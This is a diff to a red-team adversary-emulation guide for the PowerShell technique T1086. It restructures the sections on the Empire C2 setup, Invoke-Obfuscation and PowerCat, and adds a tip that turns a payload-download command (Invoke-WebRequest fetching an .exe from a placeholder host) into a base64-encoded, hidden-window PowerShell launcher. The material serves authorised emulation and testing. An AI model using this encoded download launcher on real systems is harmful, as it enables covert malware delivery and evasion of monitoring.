--- a/Techniques/T1086/T1086.md
+++ b/Techniques/T1086/T1086.md
@@ -7,7 +7,8 @@
 
 # Details
 
-## Empire
+## Tools
+### Empire
 * Install `Docker` on your C2 host
 * Edit `~/.bashrc` to add the following aliases:
 ```
@@ -23,7 +24,7 @@ source ~/.bashrc
   * Start `Empire` container: `empire_start`
   * Stop `Empire` container: `empire_stop`
 
-## Invoke-Obfuscation
+### Invoke-Obfuscation
 * Install [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)
 * Import module and run it to obfuscate the PowerShell script block as following:
 ```
@@ -36,8 +37,19 @@ Launcher\PS\7
 clip
 ```
 
-## PowerCat
+### PowerCat
 * See [Exfiltration Over Command and Control Channel](https://github.com/brianwrf/RTEmulation/blob/master/Techniques/T1041/T1041.md)
+
+## Common tips
+### PowerShell Base64 encode
+```
+powershell
+$cmd = 'Invoke-WebRequest -Uri "http://example.com/example.exe" -OutFile C:\ClientDir\example.exe';
+$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd);
+$encodedCommand = [Convert]::ToBase64String($bytes);
+$psh = "powershell -noP -sta -w 1 -enc "+$encodedCommand;
+Write-Output $psh
+```
 
 # References
 
